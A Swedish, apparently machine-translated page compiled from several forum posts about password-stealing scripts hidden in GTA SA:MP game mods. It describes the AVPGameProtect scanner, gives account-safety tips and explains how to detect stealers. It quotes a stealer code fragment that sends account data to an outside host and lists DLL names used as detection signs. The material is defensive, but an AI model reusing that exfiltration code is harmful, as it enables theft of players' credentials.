Kontrollera filen för stiller online. Internetguide - alla de mest intressanta sakerna på Internet. Sökresultatinformation



Den allra första skannern, som dök upp på den tiden då den första ASI-stylern utvecklades. Redan nästa dag efter att stillaren dök upp började jag utveckla min egen anti-steeler.

Skannern innehåller följande moduler:
- YARA signaturmotor (tack till Virustotal-programmeringsteamet för ett så kraftfullt verktyg),
- skriptmotor från Andreas Jonson (AngelScript), hastighet, enkel inbäddning och skönhet hos liknande skript i ett projekt. Det är tack vare honom som du snabbt och tekniskt kan öppna kryptor för CLEO.
- SCM-kodemulator, som kan marknadsföra CLEO kryptor ganska bra (från mig)

Programfunktioner:
– En ganska stor databas över stjälare, som har växt sedan cirka 2014. Vi har samlat en hel del skadliga moddar från flera stora och inte särskilt stora sajter.
- Möjlighet att skanna mappar och filer genom att dra dem till programfönstret.
- Slutsats kort information O skadlig programvara(typ, utvecklarens smeknamn och, i äldre versioner av databasen, distributörernas smeknamn)
- Skanna asi, dll, cleo, sf, cs och annan potential farliga filer.
- Detektering av skadlig kod i filer med ändrad tillägg, till exempel, för inte så länge sedan var det på modet att byta namn på stjälare till TXD-filer och ladda in dem i spelet med hjälp av loader.
- Uppackning av krypterade CLEO-skript och efterföljande skanning (det bör noteras att det endast dekrypterar kända kryptor och de som vi stötte på, men detta faktum är lätt att fixa, skriv bara till oss via e-post och skicka filen). När du skannar det uppackade skriptet kan du hitta källan till det senare i filen temp\decrypt.cs.
- Emulera SCM-kod i farten och dekryptera skriptet, följt av att leta efter skadlig kod. (Om skadlig kod upptäcks, se dumpen i temp\decrypt.cs)
- Vänligt och intuitivt programgränssnitt.
- Hög hastighet skanning när du kontrollerar ett stort antal filer.
- Inbyggd visning av den hittade filen i text- och hex-läge

Särskilt viktig punkt! Alla borde läsa den för att inte ställa dumma frågor.
Skannern är designad endast för att kontrollera spelmodifieringar uppackade från arkivet, i alla andra fall är det värdelöst!
Han också INTE avsett för installatörer och autoinstallatörer, msi, exe-paket, pif, mmbak, com, scr, vbs, bat, cmd, js och andra potentiellt farliga filer som inte finns i spelmoddar, det finns antivirus för dessa filer!
Också Du bör INTE skanna hela systemet, det är värdelöst och meningslöst. Denna skanner är mod-testad och är endast avsedd för mods. Du kan skanna spelmappen, men här måste du förstå att spelet har filer som kan komma åt Internet och vara redo att synas i skannerfönstret.

Jag skulle genast vilja varna dig för det det här programmet kommer inte att skydda dina konton till 100 %, som alla andra antivirus eller skanner. När de skriver på omslaget till ett antivirus 100% skydd är detta för mig redan en signal att ta bort antiviruset från disken. Men den här skannern kan påskynda sökningen efter redan kända stjälare och hjälpa dig att undvika att falla för betet från oerfarna distributörer.
Mest bästa antivirus- det är ditt huvud och dina beslut - att ladda ner eller inte ladda ner. Ladda ner mods endast från betrodda webbplatser och där arkivets säkerhet övervakas.


Författaren till programmet ansvarar inte för dina beslut och eventuella stjälare som skannern missar.

Några symboler program:


Uppmärksamhet! En fil har upptäckts som kan upprätta en internetanslutning, du bör tänka på det innan du installerar den i spelet. Men detta kan också vara automatisk uppdatering av skriptet. Det är också möjligt att ha en URL i filen. Allt beror på din förmåga att kontrollera filer manuellt.

CLEO styler hittades, filen packades upp och du kan titta på källan.

Skannern försökte packa upp skriptet, men det kanske inte fungerade eller så hittades inte den skadliga koden. Se källan i temp-mappen. Se till att filen inte är krypterad. Här måste du kontrollera skriptet manuellt.

Hittade CLEO stiller i öppen form.

En fil har hittats som laddar ner skadlig programvara till din dator

En stiller från ett ökänt projekt har hittats

Skydd hittat, filen kan utgöra ett hot. Här måste du bara lita på författarens ärlighet och rykte. Fråga författaren varför filen var krypterad (skyddad) och fundera sedan själv över hur pass adekvat svaret är. Den här filen kan mycket väl vara farlig.

Kanske är filen blockerad av ett annat program, eller så är filen noll

Jag rekommenderar inte att du lägger in sådana filer i spelet. Här kan man förvänta sig vad som helst. Detta är att slå ihop flera filer till en. Bland dessa filer kan det mycket väl finnas en stjälare eller annan skadlig kod. Lita inte på lim. Du kan bara se till att limningen är säker genom att sortera den i filer och kontrollera varje fil separat.


Vi ber dig att endast ladda ner programmet från officiella källor. Detta kommer att vara det mesta säkert alternativ.
Skriv om eventuella fel via e-post eller i denna tråd.


För dynamiskt kontoskydd rekommenderar vi att du använder en speciell plugin från DarkP1xel.

Denna plugin blockerar farliga funktioner i skript och andra moddar.
Om du har detta plugin installerat i spelet kommer modsna inte att kunna skicka webbförfrågningar till tredjepartsservrar, vilket innebär att ditt samplösenord inte kommer att hamna i fel händer, även om du av misstag installerade stealern i spel. Insticksprogrammet för också en detaljerad logg över alla misstänkta händelser i spelet. Viktig. Pluginet uppdateras ständigt, håll utkik.
p.s: glöm inte att tacka författaren för pluginet;)

Tack till alla som hjälpt oss.
Speciellt tack till Gedwadion, DarkP1xel. Det här är coola killar som har en framtid inom IT-säkerhet.

Författare:
smalloff - utveckling, projektstöd
andre500 - testning, projektstöd
Författarnas webbplatser (officiella källor): webbplats, Libertycity.ru
Post: smalloff@site
Ladda ner programmet:AVPGameProtect18042019.rar
Unna programutvecklaren öl (tack på förhand): Yandex ofiltrerad

(Obs! Stödet till det offentliga projektet har helt upphört.)

[Seriös röst av Chonishvili]: Utan många ord. Skruva på showen. Medan jag skriver detta har din bulletin och villa på BB redan slagits samman till staten, och de virtuella har överförts till angriparen, ah-ha-ha-ha, hosta hosta hosta *kvävdes*

Du kan kyla dina pruttar, eftersom cleo-filer inte laddas upp till sajten. Men det betyder inte att de är förbjudna i Samp-Rp-projektet. Bli inte förvirrad, fan!
Alla fans av modifieringar har stött på konceptet med termen "Stiller" (a.k.a Keylogger, men det är en annan historia). Vanligtvis lägger stillers dem i cleo-scripts, vilket vi ska prata om nu.

Vad är ett cleo-skript?

Jag kommer inte att förklara vad ett cleo-skript är. allmänt begrepp, låt oss gå direkt till onlinespelet. Cleo-skript för SA:MP"a är designade för att förbättra spelets bekvämlighet. Tack vare dem kan du ändra gränssnittet så att det passar dig. Fixa olika buggar, krascher etc. Men det finns också skadliga (eller fuskande) cleo -skript (fusk - bedrägeri från engelska), som förresten är strikt förbjudet på Samp-Rp-projektet . De skapades för barn som är kränkta av livet och som blivit misshandlade i skolan. Tja, du kan inte låta bli att sätta in frasen: "Chits är som Viagra, för dem som inte kan göra det själva."
De mest kända cleo-skripten ( .c leo s cript-filer) - det här är en HP-indikator i siffror, en kvadratisk radar, ett skript som ökar FPS, olika former av rustningar och hälsoränder (ibland är dessa inte ens bara ränder, utan din favoritkaraktär, till exempel A$AP Rocky. När HP minskar försvinner fotografiet och bara siluetten finns kvar).
Många människor plågas av frågan, varför finns det ingen enb-serie på sajten? Faktum är att .asi format, detta är också en cleo-fil, endast kompilerad. Det vill säga att du också kan sy en styler i den.
Du undrar säkert varför jag skriver ett ämne om det ändå inte finns någon Cleo på sajten. Men detta finns inte på sajten, men för att innehålla det behöver du åtminstone StreamMemFix1.0 .asi Och detta är bara en av många fixar för GTA, som alla fans av att pumpa upp sin San är fulla av Andreas mods till kapacitet, och därigenom göra godis av det. Och jag är redan tyst om c-huds och andra ändringar. Tycker du synd om kontot? Då är det här ämnet för dig!

Hur kontrollerar jag en .cs-fil för en styler?

Det vanligaste sättet är att kolla igenom programmet Wireshark. Allt du behöver:

  • 1. Ladda ner själva programmet (du kan göra detta från den officiella webbplatsen).
  • 2. Se den här videon, allt förklaras tydligt där.

=====================================================================================================

Det andra sättet att kontrollera Cleo för Stiller. I senaste versionen cleo-biblioteken kommer ytterligare program, heter en av dem Sunny Builder- vad vi behöver.


0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - webbplats dit kontodata skickas.
@stealer_by_mg 0 1@ är utvecklaren av stjälaren själv.

=================================================================================================

Det finns också ett tredje sätt att kontrollera filen för att stjäla. Det finns ett skript "steal_logger" .asi"Vi kommer att använda det för att kontrollera.
(Ja, han är själv ett cleo-format, men det finns inget att oroa sig för om du inte tänker på att gå in i basen med honom). Jag kommer inte att ge dig en länk till det, leta efter det på Internet.
Jag ska kort förklara hur man använder den.

  • 1. Lägg den i spelmappen.
  • 2. Låt oss gå till några SA:MP-server, under några ingen
  • 3. Vi kommer på vilket lösenord som helst, loggar in och stänger spelet.
  • 4. Den ska skapas i mappen textfil (.Text formatera). Klicka på den, och i texten letar vi efter raden med IP-adressen för vår server och lösenordet för det nyregistrerade kontot. Hittade - det betyder att hackaren redan har dessa data. Låt honom vara glad när han kommer in för att leka med piskan. Och just nu tar vi bort den sista cleo-filen.

[!] Använd som check endast nyskapade konton, logga inte in på dina huvudkonton med detta skript. Efter kontroll, radera \ eller gör en separat kopia av GTA för kontroll av skript [!]

Hur kontrollerar jag .asi-filen för stjälare?

Den enkla delen är över. Nu ska vi lära oss att kontrollera .asi-filer, eftersom stylern inte ser Wireshark i dem. Vad ska man göra? Jag kommer att lägga upp ett par av de mest kända metoderna.

Mest effektiv metod kontroller. Kollar igenom programmet IEInspector HTTP Analyzer.


===============================================================================================================

Det andra sättet är att kontrollera koden med anteckningsblock.

  • 1. Öppning .asi via Anteckningar.
  • 2. Låt oss titta på koden.

Exempel på ren när (ingen stiller)

Exempelkod med stiller(inte kernel.dll)


Låt oss vara uppmärksamma på de sista raderna.

Ett annat alternativ för en dold stjälare är namnen i texten "urlmon.dll", "wininet.dl l", "wsock32.dll" i själva koden. Eller raden" kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA LOADER ERROR"

========================================================================================================

"Administrationen återställer inte förlorade konton"- sa de.
"Kontosäkerhet är i dina händer". Jag hoppas att dina "hands up" har blivit starkare efter att ha läst detta ämne. Ta hand om dina konton.

2015-2015 © Samlad från olika forum.

AVPGameProtectär ett program som hjälper dig att söka skadliga filer i spelmodifieringar. huvud funktion program före andra anti-stöldare - möjligheten till massskanning, det vill säga du kan skanna absolut alla filer och i vilken mängd som helst, bara överföra nödvändiga filer eller en mapp med filer i programfönstret och vänta på skanningsresultaten.

Programfunktioner:
- Stor databas över stjälare, som har underhållits sedan 2014.
- Skanna asi, dll, cleo, sf, cs och andra potentiellt farliga filer.
- Hög hastighet vid skanning av ett stort antal filer.
- Visa information om stjälaren i programfönstret (typ av stjälare eller utvecklarens smeknamn).
- Inbyggd visning av hittade filer i text- och hex-läge.
- Sök efter funktionalitet för att interagera med Internet eller ladda ner filer.
- Kontrollera CLEO-skript för närvaron av en stjälare (inte alla, bara de med kryptor kända för programmet). Det dekrypterade skriptet kommer att visas i temp-mappen, i programmets rotmapp under namnet decrypt.cs
- FuncCrypt transkript från SR_Team och många andra.
- Kontinuerlig support av programmet.

Skannern är inte avsedd för att kontrollera installationsprogram och spelbyggen, eller för en fullständig genomsökning av datorn. För att skanna måste du extrahera en mapp eller filer från arkivet och dra dem till programmet.

Det är också värt att notera att programmet inte skyddar användarna till 100 %. Liksom alla andra anti-stöldare är den endast avsedd att identifiera stjälare som den känner till, och det ytterligare beslutet att använda den eller den moden ligger direkt hos dig och författaren är inte ansvarig för DINA beslut. Programmet kommer att uppdateras ständigt.

Några programkonventioner:
InetLoader- OBS! En fil har upptäckts som kan upprätta en internetanslutning, du bör tänka på det innan du laddar ner. Men detta kan också vara automatisk uppdatering av skriptet.
CLEO_Stjälare – CLEO styler hittades, filen packades upp och du kan titta på källan.
CLEO_Crypter – Skannern försökte packa upp skriptet, kanske fungerade det inte, eller så hittades inte den skadliga koden. Se källan i temp-mappen.
CLEO_Stjälare- Hittade CLEO stiller i öppen form.
Downloader_stealer- Hittade en fil som laddar ner skadlig programvara till din dator
Stealers_ru– En stiller från ett välkänt projekt hittades
Danger_VMProtect- Skydd hittat, filen kan utgöra ett hot
Det gick inte att skanna - Filen kan vara blockerad av ett annat program, eller så är filen noll
Gå med i filer– Skannern hittade flera filer som slogs samman till en. Bland dessa filer kan det mycket väl finnas en stjälare eller annan skadlig kod.

Hur kan du undvika att stöta på en tjuv?!

Stealer är ett skript som installeras genom att kopiera en fil med skadlig kod till GTA-mappen. Efter installationen, varje gång du loggar in på spelservern, kommer den att läsa alla inmatade data i dialoger (pinkoder, lösenord, hemliga nycklar, data) och skicka dem till angriparen. Således, genom att helt enkelt installera skriptet i GTA-mappen, om du anger rätt data i dialogen, kan du förlora alla dina spelkonton.

det här ögonblicket Fall av stöld av spelkonton på olika Samp-servrar har blivit vanligare. Oftast är dessa servrar med rollspelsläge, eftersom spelvalutan har sitt eget värde. Angripare tjänar pengar på din dumhet. I den här artikeln kommer jag att visa dig de metoder jag känner till. Du vet, människorna som gör dessa tjuvar lever efter principen "Om du inte äter, kommer du inte att leva."

Grundläggande tips:

1. Använd alltid alla metoder för att skydda kontot som du fått av administrationen av det projekt du spelar på. (Grafisk PIN-kod, SMS-bindning etc. Allt beror på serverns funktionalitet).
2. Använd ett lösenord som är så långt som möjligt och har en komplex struktur.
3. Logga inte in på servern med ett lösenord som du använder på andra.
4. Dela inte din kontoinformation med en person som du inte är 100% säker på.
5. Jag råder dig inte att använda olika anpassade modifieringar i spelet. De kan innehålla ett krypterat virus (Stiller). Stiller (från engelska till att stjäla, att stjäla) är en viss klass av trojaner (skadlig programvara, virus - vad du vill), vars funktionalitet helt består av att stjäla lösenord som lagras i systemet och skicka dem till "författaren"
När du har installerat stealer-moden, när du går in i spelet kommer du att ange ditt lösenord och det kommer framgångsrikt att gå över i händerna på tjuven. Oftast inbäddade i mods som (Hood, grafiska inställningar och Asi-plugin).
6. Använd ett antivirus! Det tillåter inte att du skickar din sparade e-post eller ditt konto till infekterade webbplatser (skydd mot grabbers och stalers (exe)).
7. SA:MP-serveradministrationen återställer inte hackade konton och returnerar inte pengar som gått förlorade och kommer aldrig att fråga efter dina kontolösenord.

Första sättet.

Och så är den första metoden 100% effektiv!!!
Om du inte laddar ner olika mods, cleo-skript, fusk, kommer du inte att ha NÅGRA problem och INGA stjälare!

Kolla via hemsidan:

Den första metoden kommer att skydda mot alla hacks, men detta är inte lämpligt för alla.
Och så är den andra metoden lämplig för dem som laddar ner skript, olika moddar, huvar, fusk och så vidare. Därför har jag en väg ut för dig, men den kommer inte att skydda dig till 100%! En webbplats som kontrollerar filer för olika manus, precis här . Genom att besöka sidan kan du läsa "

De senaste versionerna av stealers kan ha .txd .dff .png .dat-format. Men de är anslutna i .asi .cs .sf plugins och fungerar inte utan en anslutning. Kontrollera därför alla plugins och skript med vår checker. Om du har dolda filer i GTA, ta bort dem.


Av detta drar vi slutsatsen att stillers nu kan bädda in ett vanligt foto i mods, även i en .png-fil. Många säger

"Är du ett får eller något? Gå härifrån! Jag har spelat SA:MP i 5 år och jag vet att stjälare bara finns i mods eller cleo-format!"

Det finns inga killar, som vi kan se även på en enkel bild, weapon.png låt oss säga att jag vet, kanske en stjälare! Vi kontrollerar alltid vilken modd som helst, hur skulle du ens lita på någon. Och så, när vi kontrollerar filen för stiller, om den dyker upp

Sökresultatinformation:

Stjälare hittades inte:

Under filsökningen hittades ingen skadlig kod eller något misstänkt. Det betyder att du inte behöver oroa dig för ditt konto, vår checker använder allt möjliga metoder upptäcka skadlig kod i skript.

Programfunktioner:
– En ganska stor databas över stjälare, som har växt sedan cirka 2014. Vi har samlat en hel del skadliga moddar från flera stora och inte särskilt stora sajter. Särskilt tack till webbplatsen Gtavicecity.ru för proverna.
- Möjlighet att skanna mappar och filer genom att dra dem till programfönstret.
- Visar kort information om det skadliga programmet (typ, utvecklarens smeknamn och i äldre versioner av distributörsdatabasen)
- Skanna asi, dll, cleo, sf, cs och andra potentiellt farliga filer.
- Detektering av skadlig kod i filer med ändrad tillägg, till exempel, för inte så länge sedan var det på modet att byta namn på stjälare till TXD-filer och ladda in dem i spelet med hjälp av loader.
- Uppackning av krypterade CLEO-skript och efterföljande skanning (det bör noteras att det endast dekrypterar kända kryptor och de som vi stötte på, men detta faktum är lätt att fixa, skriv bara till oss via e-post och skicka filen). När du skannar det uppackade skriptet kan du hitta källan till det senare i filen temp\decrypt.cs.
- Emulera SCM-kod i farten och dekryptera skriptet, följt av att leta efter skadlig kod. (Om skadlig kod upptäcks, se dumpen i temp\decrypt.cs)
- Vänligt och intuitivt programgränssnitt.
- Ett ganska enkelt koncept för programmet, vilket innebär att det enkelt och ofta kan uppdateras.
- Hög skanningshastighet när du skannar ett stort antal filer.
- Inbyggd visning av den hittade filen i text- och hex-läge

Skannern är endast avsedd för att kontrollera spelmodifieringar som packats upp från arkivet; i alla andra fall är den värdelös.
Den är inte heller avsedd för installatörer och autoinstallatörer.

UPPMÄRKSAMHET!!!
Jag skulle vilja omedelbart varna dig för att det här programmet inte kommer att skydda dina konton till 100 %, som alla andra antivirus eller skanner. När de skriver på omslaget till ett antivirus 100% skydd är detta för mig redan en signal att ta bort antiviruset från disken. Men den här skannern kan påskynda sökningen efter redan kända stjälare och hjälpa dig att undvika att falla för betet från oerfarna distributörer.
Det bästa antivirusprogrammet är ditt huvud och dina beslut - att ladda ner eller inte att ladda ner. Ladda ner mods endast från betrodda webbplatser och där arkivets säkerhet övervakas.

Några programkonventioner:

UNDER UTVECKLING

HttpAnalyzer är en nätverkstrafikanalysator. Om du letade efter ett funktionellt verktyg vars syfte är att övervaka HTTP- och HTTPS-trafik i realtid, så tycker jag att du borde gilla det här programmet, det är en sorts sniffer som tydligt kan visa all nödvändig information om anslutningar!

I allmänhet kan HTTP Analyzer göra många saker, jag tror att du kan läsa mer i detalj på den officiella hemsidan, jag skrev huvudidén.